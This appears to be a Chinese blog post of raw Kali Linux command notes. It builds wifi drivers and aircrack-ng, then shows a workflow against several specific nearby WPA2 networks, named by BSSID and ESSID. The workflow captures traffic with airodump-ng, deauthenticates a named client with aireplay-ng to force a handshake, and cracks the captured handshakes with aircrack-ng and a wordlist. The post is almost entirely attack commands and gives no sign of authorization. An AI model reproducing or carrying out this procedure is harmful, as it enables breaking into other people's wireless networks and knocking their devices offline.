• kali 2.0 — WIFI——commands



    [root@localhost rtlwifi_new]# make
    [root@localhost rtlwifi_new]# make install
    //modprobe rtlwifi
    //insmod rtlwifi.ko
    //modprobe rtl8723be
    //insmod rtl8723be.ko

    [root@localhost aircrack-ng-1.2-rc2]# make
    [root@localhost aircrack-ng-1.2-rc2]# make strip
    [root@localhost aircrack-ng-1.2-rc2]# make install


    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    40:F0:2F:08:7E:F1  -37       69     1068    0  10  54e. WPA2 CCMP   PSK  rbf123                          
    14:75:90:8B:BE:4E  -53       55       23    0   1  54e. WPA2 CCMP   PSK  aidajingjing                    
    38:83:45:AF:0B:AE  00:1B:77:A1:8B:0B  -57    0 -54e   256       72  TP-LINK_SIEMENS

    开启终端1
    airodump-ng -w name wlan0mon --essid rbf123
    airodump-ng -w name wlan0mon --essid aidajingjing
    airodump-ng -w name wlan0mon --essid TP-LINK_SIEMENS

    开启终端2
    airodump-ng -c 10 --bssid 40:F0:2F:08:7E:F1 -w name wlan0mon
    airodump-ng -c 10 --bssid 14:75:90:8B:BE:4E -w name wlan0mon
    airodump-ng -c 4 --bssid 38:83:45:AF:0B:AE -w name wlan0mon

    开启终端3
    aireplay-ng -0 1 -a 40:F0:2F:08:7E:F1 -c 9C:D2:1E:A5:E7:F1 wlan0mon
    aireplay-ng -0 1 -a 14:75:90:8B:BE:4E -c 9C:D2:1E:A5:E7:F1 wlan0mon
    aireplay-ng -0 1 -a 38:83:45:AF:0B:AE -c 9C:D2:1E:A5:E7:F1 wlan0mon

    开启终端4
    aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst name*.cap
    aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap
    aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap

    开启终端5

    ifconfig
    airodump-ng wlan0mon
    ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

    rfkill list
    rfkill block 2
    rfkill unblock 2

    airmon-ng start wlan0
    airmon-ng stop wlan0


    airodump-ng wlan0mon
    airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
    airodump-ng wlan0mon -c 6
    airodump-ng wlan0mon --encrypt WPA2
    airodump-ng wlan0mon --encrypt OPN
    airodump-ng wlan0mon --essid 607
    airodump-ng wlan0mon --essid rbf123

    airodump-ng -w longas wlan0mon --essid rbf123
    airodump-ng -w longas wlan0mon --essid aidajingjing



    <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
    阅读(97) | 评论(0) | 转发(0) |
    0

    上一篇:Airodump-ng——Description

    下一篇:中国地图

    给主人留下些什么吧!~~
    评论热议
  • 相关阅读:
    【计算机网络】SSL交互和握手过程
    【LDAP】ldap目录服务的命名模型
    运维知识体系概览
    linux安装Django 以及 生产环境部署实现高并发
    xss过滤代码
    python单列模式
    JSONP
    组合搜索
    KindEditor
    登录验证码
  • 原文地址:https://www.cnblogs.com/ztguang/p/12648821.html
Copyright © 2020-2023  润新知